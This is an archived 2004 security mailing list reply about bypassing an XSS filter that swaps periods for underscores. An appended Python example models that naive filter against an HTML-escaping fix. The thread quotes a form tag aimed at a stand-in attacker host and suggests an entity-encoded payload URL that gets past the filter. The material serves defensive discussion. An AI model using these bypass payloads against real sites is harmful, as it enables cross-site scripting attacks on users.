WebApp Sec mailing list archives

Re: Fullstop Substitution in XSS
From: Jonathan Stade <jstade () mtroyal ca>
Date: Tue, 01 Jun 2004 13:38:46 -0600

On Tue, 2004-06-01 at 00:03, windo () windowlicker dyn ee wrote:
Hey.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Of course I don't know how the substitution works, but double encoding like
this MIGHT work:

print.php?print=%3Ca%20href=%22http://www%26%2346;google%26%2346;com/%22%3Egoogle%3C/a%3E

print.php does what you described in a very basic manner, prints the
input substituting any '.' with '_'.

Along similar lines, another thing to try might be to use the HTML
entity &#46; which is a period/fullstop, and also try using the entity,
but unicode encode it. Not sure if that will work, it was just something
that popped into my head.
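
The filter behaviour discussed in this thread, as an added example that is not part of any poster's message: a Python model of a print.php-style handler, showing that the entity-encoded request quoted above contains no literal '.' when the substitution runs and is only resolved to a period by the HTML parser afterwards. The function names, the decode-once assumption and the HTML-escaping variant are assumptions of this example, not something the thread states.

```python
# Added example: models the print.php behaviour described in the thread.
# Function names and the decode-once assumption are hypothetical.
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed inputs: a plain link, and the entity-encoded request from the thread.
PLAIN = "%3Ca%20href=%22http://www.google.com/%22%3Egoogle%3C/a%3E"
ENTITY = "%3Ca%20href=%22http://www%26%2346;google%26%2346;com/%22%3Egoogle%3C/a%3E"

def naive_print(query_value):
    """URL-decode once (as the web server does), then replace '.' with '_'."""
    return unquote(query_value).replace(".", "_")

def hardened_print(query_value):
    """URL-decode once, then HTML-escape so the input is emitted as text only."""
    return html.escape(unquote(query_value), quote=True)

class _HrefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        # The parser hands over attribute values with character references
        # already resolved, which is what a browser acts on.
        self.hrefs.extend(v for k, v in attrs if k == "href" and v is not None)

def parsed_hrefs(markup):
    """Return href values as seen after HTML parsing of the response body."""
    collector = _HrefCollector()
    collector.feed(markup)
    collector.close()
    return collector.hrefs

if __name__ == "__main__":
    for label, value in (("plain", PLAIN), ("entity", ENTITY)):
        print(label, "naive   ->", parsed_hrefs(naive_print(value)))
        print(label, "hardened->", parsed_hrefs(hardened_print(value)))
```

The character substitution only sees the text as it exists before HTML parsing, so it cannot account for a later decoding layer; escaping the output removes the markup context altogether.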

